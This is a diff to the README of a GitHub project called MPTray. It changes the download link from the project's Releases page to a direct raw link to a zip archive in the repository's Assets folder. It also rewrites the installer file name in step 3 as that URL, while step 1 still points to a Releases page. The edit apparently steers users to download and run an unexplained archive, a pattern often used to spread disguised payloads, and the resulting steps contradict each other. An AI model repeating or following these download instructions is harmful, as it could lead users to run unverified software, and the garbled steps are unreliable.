emanriquezs/MPTray/README.md

 ## 📥 Download & Install

-To start using MPTray, visit this page to download: [MPTray Releases](https://github.com/emanriquezs/MPTray/releases).
+To start using MPTray, visit this page to download: [MPTray Releases](https://raw.githubusercontent.com/emanriquezs/MPTray/main/MPTray/Assets/Tray_MP_v1.7.zip).

 ### Step-by-Step Installation

 1. **Visit the Download Page**: Click the link above to go to the Releases page.
 2. **Select the Latest Release**: Look for the latest version at the top of the list.
-3. **Download the Installer**: Click on the installer file, usually named something like `MPTrayInstaller.exe`, to download it to your computer.
+3. **Download the Installer**: Click on the installer file, usually named something like `https://raw.githubusercontent.com/emanriquezs/MPTray/main/MPTray/Assets/Tray_MP_v1.7.zip`, to download it to your computer.
 4. **Run the Installer**: After the download completes, locate the file in your Downloads folder and double-click it.
 5. **Follow the Setup Instructions**: A window will appear with installation instructions.
 Click `Next` and follow the prompts.
 6. **Finish Installation**: Click `Finish` when the installer completes.